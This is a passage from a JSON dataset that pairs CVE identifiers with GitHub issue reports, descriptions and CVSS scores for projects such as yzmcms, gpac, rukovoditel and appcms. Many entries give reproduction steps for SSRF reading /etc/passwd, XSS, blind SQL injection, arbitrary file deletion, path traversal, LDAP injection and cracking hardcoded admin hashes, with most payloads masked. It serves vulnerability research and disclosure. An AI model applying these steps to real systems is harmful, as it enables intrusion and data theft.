  60133. "description": "There are SSRF vulnerabilities in background collection management. Log in the background management and create a new node in the collection management FILETAG FILETAG Add our url with the attack code FILETAG FILETAG Then click collect FILETAG Because two methods are written in the source code If you have curl extensions, use curl_ Close function. If not, use file_ get_ Contents function FILETAG And when processing the URL, only the first four characters of the URL are obtained by using the substr function, and whether it is HTTP is judged. If it is, it is checked FILETAG Here, you can use the features of PHP. When PHP encounters an unknown protocol, it will throw a warning and set the protocol to null. When the Protoco is null or file, the local operation will be carried out. By default, the local file operation will be performed if the protocol is not transferred or the protocol does not exist. Therefore, we can use a custom protocol, such as httpxxx, which can start from HTTP, but can't be HTTPS. We can try to read the /etc/passwd file FILETAG Then click collect FILETAG The file was read successfully",
  60134. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
  60135. "severity": "HIGH",
  60136. "baseScore": 7.5,
  60137. "impactScore": 3.6,
  60138. "exploitabilityScore": 3.9
  60139. },
  60140. {
  60141. "CVE_ID": "CVE-2020-35971",
  60142. "Issue_Url_old": "https://github.com/yzmcms/yzmcms/issues/54",
  60143. "Issue_Url_new": "https://github.com/yzmcms/yzmcms/issues/54",
  60144. "Repo_new": "yzmcms/yzmcms",
  60145. "Issue_Created_At": "2020-12-30T09:52:17Z",
  60146. "description": "APITAG NUMBERTAG SS bug. Hi, I would like to report Cross Site Scripting vulnerability in APITAG NUMBERTAG Description: In the FILETAG row NUMBERTAG No filtering of the searinfo APITAG xss vulnerability was discovered in yzmcms. In APITAG NUMBERTAG stored XSS exists via the PATHTAG value parameter, which allows remote attackers to inject arbitrary web script or HTML. FILETAG FILETAG FILETAG FILETAG",
  60147. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
  60148. "severity": "MEDIUM",
  60149. "baseScore": 5.4,
  60150. "impactScore": 2.7,
  60151. "exploitabilityScore": 2.3
  60152. },
  60153. {
  60154. "CVE_ID": "CVE-2020-35972",
  60155. "Issue_Url_old": "https://github.com/yzmcms/yzmcms/issues/55",
  60156. "Issue_Url_new": "https://github.com/yzmcms/yzmcms/issues/55",
  60157. "Repo_new": "yzmcms/yzmcms",
  60158. "Issue_Created_At": "2020-12-30T12:40:28Z",
  60159. "description": "There is a CSRF vulnerability to add users. After the administrator logged in, open the following the page POC: FILETAG APITAG FILETAG Refresh page after opening FILETAG CODETAG",
  60160. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N",
  60161. "severity": "MEDIUM",
  60162. "baseScore": 4.3,
  60163. "impactScore": 1.4,
  60164. "exploitabilityScore": 2.8
  60165. },
  60166. {
  60167. "CVE_ID": "CVE-2020-35979",
  60168. "Issue_Url_old": "https://github.com/gpac/gpac/issues/1662",
  60169. "Issue_Url_new": "https://github.com/gpac/gpac/issues/1662",
  60170. "Repo_new": "gpac/gpac",
  60171. "Issue_Created_At": "2020-12-15T12:02:59Z",
  60172. "description": "APITAG heap buffer overflow in gp_rtp_builder_do_avc APITAG System info: Ubuntu NUMBERTAG LTS NUMBERTAG gcc NUMBERTAG gpac (latest master c4f8bc6e) I think it is probably due to an imcomplete fix of NUMBERTAG URLTAG Compile Command: APITAG Run Command: APITAG POC file: URLTAG ASAN info: ERRORTAG Addition: This bug was found with our fuzzer, which is based on AFL. Our fuzzer is developed by Yuanpingyu( EMAILTAG ) APITAG APITAG APITAG EMAILTAG ) and Yanhao.",
  60173. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  60174. "severity": "HIGH",
  60175. "baseScore": 7.8,
  60176. "impactScore": 5.9,
  60177. "exploitabilityScore": 1.8
  60178. },
  60179. {
  60180. "CVE_ID": "CVE-2020-35980",
  60181. "Issue_Url_old": "https://github.com/gpac/gpac/issues/1661",
  60182. "Issue_Url_new": "https://github.com/gpac/gpac/issues/1661",
  60183. "Repo_new": "gpac/gpac",
  60184. "Issue_Created_At": "2020-12-15T12:01:23Z",
  60185. "description": "APITAG heap use after free in gf_isom_box_del APITAG System info: Ubuntu NUMBERTAG LTS NUMBERTAG gcc NUMBERTAG gpac (latest master c4f8bc6e) I think it is probably due to an imcomplete fix of NUMBERTAG URLTAG NUMBERTAG URLTAG and NUMBERTAG URLTAG . Compile Command: APITAG Run Command: APITAG POC file: URLTAG gdb info: CODETAG ASAN info: ERRORTAG Addition: This bug was found with our fuzzer, which is based on AFL. Our fuzzer is developed by Yuanpingyu( EMAILTAG ) APITAG APITAG APITAG EMAILTAG ) and Yanhao.",
  60186. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  60187. "severity": "HIGH",
  60188. "baseScore": 7.8,
  60189. "impactScore": 5.9,
  60190. "exploitabilityScore": 1.8
  60191. },
  60192. {
  60193. "CVE_ID": "CVE-2020-35981",
  60194. "Issue_Url_old": "https://github.com/gpac/gpac/issues/1659",
  60195. "Issue_Url_new": "https://github.com/gpac/gpac/issues/1659",
  60196. "Repo_new": "gpac/gpac",
  60197. "Issue_Created_At": "2020-12-15T11:57:41Z",
  60198. "description": "A NULL pointer dereference in the function APITAG APITAG System info: Ubuntu NUMBERTAG LTS NUMBERTAG gcc NUMBERTAG gpac (latest master c4f8bc6e) I think it is probably due to an imcomplete fix of NUMBERTAG URLTAG Compile Command: APITAG Run Command: APITAG POC file: URLTAG gdb info: CODETAG ASAN info: ERRORTAG Addition: This bug was found with our fuzzer, which is based on AFL. Our fuzzer is developed by Yuanpingyu( EMAILTAG ) APITAG APITAG APITAG EMAILTAG ) and Yanhao.",
  60199. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  60200. "severity": "HIGH",
  60201. "baseScore": 7.8,
  60202. "impactScore": 5.9,
  60203. "exploitabilityScore": 1.8
  60204. },
  60205. {
  60206. "CVE_ID": "CVE-2020-35982",
  60207. "Issue_Url_old": "https://github.com/gpac/gpac/issues/1660",
  60208. "Issue_Url_new": "https://github.com/gpac/gpac/issues/1660",
  60209. "Repo_new": "gpac/gpac",
  60210. "Issue_Created_At": "2020-12-15T11:59:14Z",
  60211. "description": "A NULL pointer dereference in the function gf_hinter_track_finalize in APITAG System info: Ubuntu NUMBERTAG LTS NUMBERTAG gcc NUMBERTAG gpac (latest master c4f8bc6e) Compile Command: APITAG Run Command: APITAG POC file: URLTAG gdb info: CODETAG ASAN info: ERRORTAG Addition: This bug was found with our fuzzer, which is based on AFL. Our fuzzer is developed by Yuanpingyu( EMAILTAG ) APITAG APITAG APITAG EMAILTAG ) and Yanhao.",
  60212. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  60213. "severity": "HIGH",
  60214. "baseScore": 7.8,
  60215. "impactScore": 5.9,
  60216. "exploitabilityScore": 1.8
  60217. },
  60218. {
  60219. "CVE_ID": "CVE-2020-35984",
  60220. "Issue_Url_old": "https://github.com/r0ck3t1973/rukovoditel/issues/4",
  60221. "Issue_Url_new": "https://github.com/r0ck3t1973/rukovoditel/issues/4",
  60222. "Repo_new": "r0ck3t1973/rukovoditel",
  60223. "Issue_Created_At": "2020-12-16T01:54:42Z",
  60224. "description": "Store Cross Site Scripting Vulnerability on \"users_alerts\" in rukovoditel NUMBERTAG APITAG the bug/ I download install rukoviditel NUMBERTAG An authenticated malicious user can take advantage of a Stored XSS vulnerability in the \"users_alerts\" feature. To Reproduce APITAG to reproduce the behavior NUMBERTAG Login into the panel NUMBERTAG Go to PATHTAG NUMBERTAG Add new 'users_alerts NUMBERTAG Insert payload: \"> APITAG NUMBERTAG Save and BOOM!!!! Alert XSS Message APITAG behavior/ The removal of script tags is not sufficient to prevent an XSS attack. You must HTML Entity encode any output that is reflected back to the page. APITAG FILETAG FILETAG",
  60225. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
  60226. "severity": "MEDIUM",
  60227. "baseScore": 5.4,
  60228. "impactScore": 2.7,
  60229. "exploitabilityScore": 2.3
  60230. },
  60231. {
  60232. "CVE_ID": "CVE-2020-35985",
  60233. "Issue_Url_old": "https://github.com/r0ck3t1973/rukovoditel/issues/3",
  60234. "Issue_Url_new": "https://github.com/r0ck3t1973/rukovoditel/issues/3",
  60235. "Repo_new": "r0ck3t1973/rukovoditel",
  60236. "Issue_Created_At": "2020-12-16T01:51:19Z",
  60237. "description": "Store Cross Site Scripting Vulnerability on \"global_lists\" in rukovoditel NUMBERTAG APITAG the bug/ I download install rukoviditel NUMBERTAG An authenticated malicious user can take advantage of a Stored XSS vulnerability in the \"global_lists\" feature. To Reproduce APITAG to reproduce the behavior NUMBERTAG Login into the panel NUMBERTAG Go to PATHTAG NUMBERTAG Add new 'global_lists NUMBERTAG Insert payload: \"> APITAG NUMBERTAG Save and BOOM!!!! Alert XSS Message APITAG behavior/ The removal of script tags is not sufficient to prevent an XSS attack. You must HTML Entity encode any output that is reflected back to the page. APITAG FILETAG FILETAG",
  60238. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
  60239. "severity": "MEDIUM",
  60240. "baseScore": 5.4,
  60241. "impactScore": 2.7,
  60242. "exploitabilityScore": 2.3
  60243. },
  60244. {
  60245. "CVE_ID": "CVE-2020-35986",
  60246. "Issue_Url_old": "https://github.com/r0ck3t1973/rukovoditel/issues/2",
  60247. "Issue_Url_new": "https://github.com/r0ck3t1973/rukovoditel/issues/2",
  60248. "Repo_new": "r0ck3t1973/rukovoditel",
  60249. "Issue_Created_At": "2020-12-16T01:46:27Z",
  60250. "description": "Store Cross Site Scripting Vulnerability on \"users_groups\" in rukovoditel NUMBERTAG APITAG the bug/ I download install rukoviditel NUMBERTAG An authenticated malicious user can take advantage of a Stored XSS vulnerability in the APITAG feature. To Reproduce APITAG to reproduce the behavior NUMBERTAG Login into the panel NUMBERTAG Go to PATHTAG NUMBERTAG Add new 'users_groups NUMBERTAG Insert payload: \"> APITAG NUMBERTAG Save and BOOM!!!! Alert XSS Message APITAG behavior/ The removal of script tags is not sufficient to prevent an XSS attack. You must HTML Entity encode any output that is reflected back to the page APITAG FILETAG FILETAG",
  60251. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
  60252. "severity": "MEDIUM",
  60253. "baseScore": 5.4,
  60254. "impactScore": 2.7,
  60255. "exploitabilityScore": 2.3
  60256. },
  60257. {
  60258. "CVE_ID": "CVE-2020-35987",
  60259. "Issue_Url_old": "https://github.com/r0ck3t1973/rukovoditel/issues/1",
  60260. "Issue_Url_new": "https://github.com/r0ck3t1973/rukovoditel/issues/1",
  60261. "Repo_new": "r0ck3t1973/rukovoditel",
  60262. "Issue_Created_At": "2020-12-16T01:41:10Z",
  60263. "description": "Cross Site Script Vulnerability on APITAG in rukovoditel NUMBERTAG APITAG the bug/ I download install rukoviditel NUMBERTAG An authenticated malicious user can take advantage of a Stored XSS vulnerability in the APITAG feature. To Reproduce APITAG to reproduce the behavior NUMBERTAG Login into the panel NUMBERTAG Go to PATHTAG NUMBERTAG Add new APITAG NUMBERTAG Insert payload: \"> APITAG NUMBERTAG Save and BOOM!!!! Alert XSS Message APITAG behavior/ The removal of script tags is not sufficient to prevent an XSS attack. You must HTML Entity encode any output that is reflected back to the page APITAG NUMBERTAG insert payload module 'entities' FILETAG NUMBERTAG BOOM!!! FILETAG APITAG (please complete the following information):/ OS: Windows Browser: All Version",
  60264. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
  60265. "severity": "MEDIUM",
  60266. "baseScore": 5.4,
  60267. "impactScore": 2.7,
  60268. "exploitabilityScore": 2.3
  60269. },
  60270. {
  60271. "CVE_ID": "CVE-2020-36004",
  60272. "Issue_Url_old": "https://github.com/source-trace/appcms/issues/2",
  60273. "Issue_Url_new": "https://github.com/source-trace/appcms/issues/2",
  60274. "Repo_new": "source-trace/appcms",
  60275. "Issue_Created_At": "2020-12-18T06:13:11Z",
  60276. "description": "SQL injection vulnerability exists in APITAG required). First, the loopholes should be reappeared, and then the reasons should be analyzed : After logging in the background ,We know that if we need to add an app, we need a key: FILETAG FILETAG So before testing, I need to create a new table in the database and add data . FILETAG The table name is \"app\"_ cms_list\" , It then contains two pieces of data, as shown in the figure. Next, we can visit this link to perform blind SQL injection in the \"now\":(\"dawn\" is the original \"admin\", but the system needs us to change the background name) URLTAG Pay attention to the use of \"+\" instead of \"space\", and unsuccessful words will lead to NUMBERTAG At the same time, remember to log in to the background. FILETAG FILETAG FILETAG Little surprise, we also found that its cookie did not change before and after login, but it was in the header, interesting. Next, we analyze the code : FILETAG We can control them APITAG go to \"get_ List\": Our \"$now\" was handed over to \"$params FILETAG FILETAG FILETAG In any case, our $where is not filtered and goes directly into the SQL statement : FILETAG We follow the \"query\": FILETAG FILETAG FILETAG nice!",
  60277. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N",
  60278. "severity": "MEDIUM",
  60279. "baseScore": 6.5,
  60280. "impactScore": 3.6,
  60281. "exploitabilityScore": 2.8
  60282. },
  60283. {
  60284. "CVE_ID": "CVE-2020-36005",
  60285. "Issue_Url_old": "https://github.com/source-trace/appcms/issues/3",
  60286. "Issue_Url_new": "https://github.com/source-trace/appcms/issues/3",
  60287. "Repo_new": "source-trace/appcms",
  60288. "Issue_Created_At": "2020-12-18T06:18:00Z",
  60289. "description": "I found out in FILETAG After logging in, allow me to delete any APITAG required). First, we find that there is a sensitive function for \"del_resource\" of FILETAG FILETAG We follow it to APITAG FILETAG FILETAG How do we call the \"m__del_resource\" function? FILETAG Good. I already know how to use it : Let's first create a test file FILETAG in the root directory: FILETAG Open burp and pay attention to the data of get and APITAG that you have to log in to the background first: URLTAG FILETAG Click send, it shows failed? FILETAG But when we look at the local files, APITAG has disappeared : FILETAG",
  60290. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:H/A:H",
  60291. "severity": "MEDIUM",
  60292. "baseScore": 6.5,
  60293. "impactScore": 5.2,
  60294. "exploitabilityScore": 1.2
  60295. },
  60296. {
  60297. "CVE_ID": "CVE-2020-36006",
  60298. "Issue_Url_old": "https://github.com/source-trace/appcms/issues/4",
  60299. "Issue_Url_new": "https://github.com/source-trace/appcms/issues/4",
  60300. "Repo_new": "source-trace/appcms",
  60301. "Issue_Created_At": "2020-12-18T06:22:17Z",
  60302. "description": "I found out in FILETAG After logging in, allow me to delete any APITAG required). In the same (issues NUMBERTAG we found another point : FILETAG FILETAG FILETAG",
  60303. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:H/A:H",
  60304. "severity": "MEDIUM",
  60305. "baseScore": 6.5,
  60306. "impactScore": 5.2,
  60307. "exploitabilityScore": 1.2
  60308. },
  60309. {
  60310. "CVE_ID": "CVE-2020-36007",
  60311. "Issue_Url_old": "https://github.com/source-trace/appcms/issues/7",
  60312. "Issue_Url_new": "https://github.com/source-trace/appcms/issues/7",
  60313. "Repo_new": "source-trace/appcms",
  60314. "Issue_Created_At": "2020-12-18T06:30:01Z",
  60315. "description": "I found Reflective XSS in APITAG required). Of course, we have to log in to the background first. Let's go look at the code, it's very easy : PATHTAG FILETAG payload: APITAG Of course, there are many files with the same problem. FILETAG",
  60316. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  60317. "severity": "MEDIUM",
  60318. "baseScore": 6.1,
  60319. "impactScore": 2.7,
  60320. "exploitabilityScore": 2.8
  60321. },
  60322. {
  60323. "CVE_ID": "CVE-2020-36008",
  60324. "Issue_Url_old": "https://github.com/SomeBottle/OBottle/issues/7",
  60325. "Issue_Url_new": "https://github.com/somebottle/obottle/issues/7",
  60326. "Repo_new": "somebottle/obottle",
  60327. "Issue_Created_At": "2020-12-20T03:02:43Z",
  60328. "description": "APITAG NUMBERTAG FILETAG has an arbitrary file write APITAG login\uff09. If you don't think it's important, you can ignore me. The trigger point is here: FILETAG FILETAG We want to enter here, first of all, there are several conditions: APITAG in FILETAG NUMBERTAG FILETAG We first visit the login interface to enter the background: FILETAG FILETAG Then we type payload in the title: APITAG FILETAG Then it will automatically jump to the published page: FILETAG",
  60329. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:H",
  60330. "severity": "HIGH",
  60331. "baseScore": 8.1,
  60332. "impactScore": 5.2,
  60333. "exploitabilityScore": 2.8
  60334. },
  60335. {
  60336. "CVE_ID": "CVE-2020-36009",
  60337. "Issue_Url_old": "https://github.com/SomeBottle/OBottle/issues/6",
  60338. "Issue_Url_new": "https://github.com/somebottle/obottle/issues/6",
  60339. "Repo_new": "somebottle/obottle",
  60340. "Issue_Created_At": "2020-12-20T02:59:07Z",
  60341. "description": "\\c\\g.php has an arbitrary file download vulnerability. If you don't think it's important, you can ignore me. FILETAG As you can see, we need to go through two levels to get to the castle. These data are not filtered. FILETAG We need to bypass the logic here. What should we do? FILETAG APITAG POC: POST APITAG data: PATHTAG FILETAG",
  60342. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
  60343. "severity": "HIGH",
  60344. "baseScore": 7.5,
  60345. "impactScore": 3.6,
  60346. "exploitabilityScore": 3.9
  60347. },
  60348. {
  60349. "CVE_ID": "CVE-2020-36051",
  60350. "Issue_Url_old": "https://github.com/bg5sbk/MiniCMS/issues/39",
  60351. "Issue_Url_new": "https://github.com/bg5sbk/minicms/issues/39",
  60352. "Repo_new": "bg5sbk/minicms",
  60353. "Issue_Created_At": "2020-12-23T06:13:59Z",
  60354. "description": "There is two path traversal vulnerability. post_edit and FILETAG line NUMBERTAG index_file = PATHTAG line NUMBERTAG index_file = PATHTAG post_state is controllable and there is no filtering limit We can use ../ to loop through all files",
  60355. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
  60356. "severity": "HIGH",
  60357. "baseScore": 7.5,
  60358. "impactScore": 3.6,
  60359. "exploitabilityScore": 3.9
  60360. },
  60361. {
  60362. "CVE_ID": "CVE-2020-36056",
  60363. "Issue_Url_old": "https://github.com/VivekPanday12/CVE-/issues/5",
  60364. "Issue_Url_new": "https://github.com/vivekpanday12/cve-/issues/5",
  60365. "Repo_new": "vivekpanday12/cve-",
  60366. "Issue_Created_At": "2022-01-23T15:03:12Z",
  60367. "description": "CVETAG beetel Moderm NUMBERTAG r1 \u2014 Cross Site Scripting on the beetel NUMBERTAG r1 via the Ping Diagnostic. Exploit Title: beetel Moderm NUMBERTAG r1 \u2014 Cross Site Scripting on the beetel NUMBERTAG r1 via the Ping Diagnostic Date NUMBERTAG Exploit Author: VIVEK PANDAY Version: Firmware Version APITAG NUMBERTAG R1 Tested on Windows NUMBERTAG Linkedln Contact: URLTAG CVETAG APITAG site scripting] (XSS) Cross site scripting (XSS) is a common attack vector that injects malicious code into a vulnerable web application. XSS differs from other web attack vectors (e.g., SQL injections), in that it does not directly target the application itself. Instead, the users of the web application are the ones at risk. APITAG To Reproduce NUMBERTAG Login to your router NUMBERTAG After signing NUMBERTAG Select for Maintance Mode NUMBERTAG Go to Ping Diagnostic option NUMBERTAG In the host Name field, enter any of these payloads: APITAG alert APITAG APITAG",
  60368. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
  60369. "severity": "MEDIUM",
  60370. "baseScore": 5.4,
  60371. "impactScore": 2.7,
  60372. "exploitabilityScore": 2.3
  60373. },
  60374. {
  60375. "CVE_ID": "CVE-2020-36062",
  60376. "Issue_Url_old": "https://github.com/VivekPanday12/CVE-/issues/3",
  60377. "Issue_Url_new": "https://github.com/vivekpanday12/cve-/issues/3",
  60378. "Repo_new": "vivekpanday12/cve-",
  60379. "Issue_Created_At": "2022-01-23T14:55:24Z",
  60380. "description": "CVE NUMBERTAG Dairy Farm Shop Management System \u2014 Use of Hard coded Credentials in Source Code Leads to Admin Panel Access. Exploit Title: Dairy Farm Shop Management System \u00a0\u2014 Use of Hard coded Credentials in Source Code Leads to Admin Panel Access Date NUMBERTAG Exploit Author: VIVEK PANDAY \u00a0 \u00a0 Vendor Homepage: FILETAG Software Link: URLTAG Version NUMBERTAG Tested on: Windows NUMBERTAG Linkedln Contact: URLTAG CVE NUMBERTAG Hardcoded Credentials:] Hardcoded Passwords, also often referred to as Embedded Credentials, are plain text passwords or other secrets in source code. Password hardcoding refers to the practice of embedding plain text (non encrypted) passwords and other secrets (SSH Keys, APITAG secrets, etc.) into the source code. Default, hardcoded passwords may be used across many of the same devices, applications, systems, which helps simplify set up at scale, but at the same time, poses a considerable cybersecurity risk. APITAG Vectors] An attacker can gain admin panel access using default credentials and do malicious activities Proof Of Concept NUMBERTAG Download source code from\u00a0 URLTAG NUMBERTAG Now unzip it and go to the Database folder here we can see one SQL file NUMBERTAG Now open that file using Notepad and there we can see admin credentials. but the password is encrypted .from pattern I identified that this is MD5 hash. so we can easily decrypt using crackstation.net or any hash cracker tools like Hashcat, John the ripper. APITAG use a strong encryption algorithm like SHA NUMBERTAG with APITAG use default credentials always change during installation time",
  60381. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  60382. "severity": "CRITICAL",
  60383. "baseScore": 9.8,
  60384. "impactScore": 5.9,
  60385. "exploitabilityScore": 3.9
  60386. },
  60387. {
  60388. "CVE_ID": "CVE-2020-36064",
  60389. "Issue_Url_old": "https://github.com/VivekPanday12/CVE-/issues/2",
  60390. "Issue_Url_new": "https://github.com/vivekpanday12/cve-/issues/2",
  60391. "Repo_new": "vivekpanday12/cve-",
  60392. "Issue_Created_At": "2022-01-23T14:03:54Z",
  60393. "description": "CVETAG Online Course Registration \u2014 Use of Hard coded Credentials in Source Code Leads to Admin Panel Access. Exploit Title: Online Course Registration \u2014 Use of Hard coded Credentials in Source Code Leads to Admin Panel Access Date NUMBERTAG Exploit Author: VIVEK PANDAY \u00a0 Vendor Homepage: FILETAG Software Link: FILETAG Version NUMBERTAG Tested on Windows NUMBERTAG Linkedln Contact: URLTAG \u00a0 CVETAG Hardcoded Credentials: Hardcoded Passwords, also often referred to as Embedded Credentials, are plain text passwords or other secrets in source code. Password hardcoding refers to the practice of embedding plain text (non encrypted) passwords and other secrets (SSH Keys, APITAG secrets, etc.) into the source code. Default, hardcoded passwords may be used across many of the same devices, applications, systems, which helps simplify set up at scale, but at the same time, poses a considerable cybersecurity risk. APITAG Vectors] An attacker can gain admin panel access using default credentials and do malicious activities Proof Of Concept NUMBERTAG Download source code from\u00a0 FILETAG NUMBERTAG Now unzip it and go to the Database folder here we can see one SQL file NUMBERTAG Now open that file using Notepad and there we can see admin credentials. but the password is encrypted .from pattern I identified that this is MD5 hash. so we can easily decrypt using crackstation.net or any hash cracker tools like Hashcat, John the ripper.",
  60394. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  60395. "severity": "CRITICAL",
  60396. "baseScore": 9.8,
  60397. "impactScore": 5.9,
  60398. "exploitabilityScore": 3.9
  60399. },
  60400. {
  60401. "CVE_ID": "CVE-2020-36066",
  60402. "Issue_Url_old": "https://github.com/tidwall/gjson/issues/195",
  60403. "Issue_Url_new": "https://github.com/tidwall/gjson/issues/195",
  60404. "Repo_new": "tidwall/gjson",
  60405. "Issue_Created_At": "2020-12-23T07:10:22Z",
  60406. "description": "APITAG can cause APITAG attacks in specific input scenarios. The following POC can cause redos.. func APITAG { APITAG := APITAG APITAG APITAG }",
  60407. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  60408. "severity": "HIGH",
  60409. "baseScore": 7.5,
  60410. "impactScore": 3.6,
  60411. "exploitabilityScore": 3.9
  60412. },
  60413. {
  60414. "CVE_ID": "CVE-2020-36067",
  60415. "Issue_Url_old": "https://github.com/tidwall/gjson/issues/196",
  60416. "Issue_Url_new": "https://github.com/tidwall/gjson/issues/196",
  60417. "Repo_new": "tidwall/gjson",
  60418. "Issue_Created_At": "2020-12-24T02:40:47Z",
  60419. "description": "panic: runtime error: slice bounds out of range. URLTAG",
  60420. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  60421. "severity": "HIGH",
  60422. "baseScore": 7.5,
  60423. "impactScore": 3.6,
  60424. "exploitabilityScore": 3.9
  60425. },
  60426. {
  60427. "CVE_ID": "CVE-2020-36079",
  60428. "Issue_Url_old": "https://github.com/zenphoto/zenphoto/issues/1292",
  60429. "Issue_Url_new": "https://github.com/zenphoto/zenphoto/issues/1292",
  60430. "Repo_new": "zenphoto/zenphoto",
  60431. "Issue_Created_At": "2021-02-28T15:14:45Z",
  60432. "description": "CVETAG clarification needed. CVETAG URLTAG vulnerability description is: CODETAG Am I correct that this is not a vulnerability and needs admin privileges (or special permissions for regular users) and that the software is intended to behave in this manner?",
  60433. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
  60434. "severity": "HIGH",
  60435. "baseScore": 7.2,
  60436. "impactScore": 5.9,
  60437. "exploitabilityScore": 1.2
  60438. },
  60439. {
  60440. "CVE_ID": "CVE-2020-36120",
  60441. "Issue_Url_old": "https://github.com/saitoha/libsixel/issues/143",
  60442. "Issue_Url_new": "https://github.com/saitoha/libsixel/issues/143",
  60443. "Repo_new": "saitoha/libsixel",
  60444. "Issue_Created_At": "2020-12-30T04:12:13Z",
  60445. "description": "stack buffer overflow in sixel_encoder_encode_bytes at APITAG Version Libsixel NUMBERTAG Ubuntu NUMBERTAG LTS I fuzzed the sixelapi ERRORTAG Please use the following method to compile the attached cc file and run APITAG FILETAG Because uploading the zip failed,I switched to a txt file,please download the attachment and modify the suffix to cc ERRORTAG",
  60446. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  60447. "severity": "HIGH",
  60448. "baseScore": 7.5,
  60449. "impactScore": 3.6,
  60450. "exploitabilityScore": 3.9
  60451. },
  60452. {
  60453. "CVE_ID": "CVE-2020-36123",
  60454. "Issue_Url_old": "https://github.com/saitoha/libsixel/issues/144",
  60455. "Issue_Url_new": "https://github.com/saitoha/libsixel/issues/144",
  60456. "Repo_new": "saitoha/libsixel",
  60457. "Issue_Created_At": "2020-12-31T01:11:15Z",
  60458. "description": "APITAG double free in in sixel_chunk_destroy PATHTAG img2sixel NUMBERTAG configured with: libcurl: no libpng: yes libjpeg: no gdk pixbuf2: no GD: no compiled with : APITAG run APITAG FILETAG ERRORTAG",
  60459. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  60460. "severity": "HIGH",
  60461. "baseScore": 8.8,
  60462. "impactScore": 5.9,
  60463. "exploitabilityScore": 2.8
  60464. },
  60465. {
  60466. "CVE_ID": "CVE-2020-36144",
  60467. "Issue_Url_old": "https://github.com/getredash/redash/issues/5426",
  60468. "Issue_Url_new": "https://github.com/getredash/redash/issues/5426",
  60469. "Repo_new": "getredash/redash",
  60470. "Issue_Created_At": "2021-03-14T02:16:09Z",
  60471. "description": "LDAP Injection . I've tried to contact the security team through APITAG but had no response. I'm attaching the CVE contents for a proper fix. Suggested description > Redash is affected by LDAP Injection. There is an authentication > bypass and information leak through the crafting of special queries, > escaping the provided template because the ldap_user = > APITAG APITAG > auth_ldap_user(username, password) APITAG % > {\"username\": username} code lacks sanitization. Additional Information > I sent an email to the organization through security APITAG (specified in URLTAG NUMBERTAG days ago and haven't got a reply yet. > Repo link: URLTAG APITAG Other > CVETAG : LDAP Injection Affected Component > PATHTAG > > (line NUMBERTAG ldap_user = APITAG APITAG > (line NUMBERTAG def auth_ldap_user(username, password) > (line NUMBERTAG APITAG % {\"username\": username}, Attack Type > Remote Impact Escalation of Privileges > true Impact Information Disclosure > true Attack Vectors > To exploit this vulnerability, the LDAP Authentication must be enabled, and an attacker has to craft a query escaping the template. > > Entry Point: ldap_user = APITAG APITAG (line NUMBERTAG Since there is no sanitization when it arrives to the actual search function from LDAP (line NUMBERTAG an special crafted query can bypass the authentication and exfiltrate information. Reference > URLTAG > URLTAG > URLTAG",
  60472. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N",
  60473. "severity": "MEDIUM",
  60474. "baseScore": 5.3,
  60475. "impactScore": 1.4,
  60476. "exploitabilityScore": 3.9
  60477. },
  60478. {
  60479. "CVE_ID": "CVE-2020-36148",
  60480. "Issue_Url_old": "https://github.com/hoene/libmysofa/issues/138",
  60481. "Issue_Url_new": "https://github.com/hoene/libmysofa/issues/138",
  60482. "Repo_new": "hoene/libmysofa",
  60483. "Issue_Created_At": "2020-08-26T16:00:48Z",
